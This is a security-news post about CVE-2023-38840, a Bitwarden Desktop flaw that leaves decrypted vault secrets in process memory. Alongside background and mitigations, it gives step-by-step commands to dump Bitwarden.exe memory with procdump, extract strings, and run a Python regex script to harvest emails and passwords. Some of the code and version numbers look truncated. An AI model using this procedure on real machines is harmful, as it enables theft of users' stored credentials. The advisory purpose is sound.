CVE CyberSecurity Database News

CVE-2023-38840 - How Bitwarden Desktop 2023.7. Leaks Secrets Through Local Process Memory

Poster -

CVE-2023-38840 is a security vulnerability found in Bitwarden Desktop, versions 2023.7. and below. If an attacker can run code on the same machine as Bitwarden (has "local access"), they may be able to extract sensitive information (such as vault contents, passwords, etc.) from the memory of the Bitwarden desktop process (Bitwarden.exe).

It's not a remote attack — but for shared, public, or compromised PCs, it's something to worry about.

Why is this important?

Bitwarden is a popular open-source password manager. People trust it to keep their entire digital life safe. If private data from Bitwarden's process memory can be accessed by another local user or malware, that's a serious risk.

Unlike remote attacks, this bug requires local access. But for environments like shared computers or where malware is present, this could lead to major data exposure.

How the exploit works

When you open your Bitwarden vault on the Desktop app, most of your secrets are decrypted and stored in memory while the app runs. Due to how Bitwarden Desktop 2023.7. (and earlier) is coded, this sensitive data remains in memory in plaintext and could be read directly from process memory.

On Windows, any user with permission can inspect and extract another process' RAM if running with the right privileges.

Key points

- Bitwarden Desktop does not scrub/vault secrets in RAM after use.

No encryption is applied to in-memory data.

- Bitwarden.exe can be scanned by tools like Process Hacker, procdump, strings, or custom scripts.

Local access to the PC (either physical, via RDP, or via malware)

- Sysinternals procdump or similar tool (https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)
- Optional: strings utility

You can open Task Manager and find Bitwarden.exe, or use PowerShell

Get-Process | Where-Object {$_.ProcessName -like "Bitwarden"}

Run in terminal as administrator (replace <pid> with actual process ID)

procdump -ma <pid> bitwarden_mem.dmp

4. Search for secrets

Now you can use strings or a hex editor to search the dump. Common search terms: website URLs, email addresses, parts of master password, etc.

Example with strings

strings bitwarden_mem.dmp > bw_strings.txt

You might see pieces like

https://mybank.com
JohnDoe
P@sswrdSuperSecret!
2FA-backup-code-123456

Real-world attackers may automate searching with a Python script to look for patterns like URLs, emails, or regex for password-like strings.

Here's a Python snippet to search for possible email addresses and passwords in the dump

import re

with open('bw_strings.txt', 'r', encoding='utf-8', errors='ignore') as f:
    data = f.read()

emails = re.findall(r'[\w\.-]+@[\w\.-]+', data)
passwords = re.findall(r'(?i)[A-Za-z-9!@#$%^&*()_+=\-{}\[\]:;"\'?\/\\\.]{8,}', data)

print("Possible Emails:")
print(set(emails))
print("\nPossible Passwords:")
print(set(passwords))

Mitigation

- Upgrade Bitwarden Desktop to at least version 2023.8. or latest, where this bug has been addressed.

Do not use Bitwarden Desktop on shared or untrusted computers.

- If you handled sensitive data via Bitwarden Desktop on compromised machines, consider rotating your passwords.
- End a Bitwarden session and close the application completely after use — this removes decrypted secrets from memory.

References

- Official Bitwarden Security Advisory
- CVE Details for CVE-2023-38840
- Procdump Download (Sysinternals)
- How to Search Memory Dumps for Secrets

Summary

CVE-2023-38840 in Bitwarden Desktop v2023.7. and earlier highlights the real risk of desktop app secrets being left in RAM — and how easy it can be for attackers with local access to exploit this. Always keep security software updated and control who has access to your machine.

Timeline

Published on: 08/15/2023 17:15:00 UTC
Last modified on: 08/22/2023 14:58:00 UTC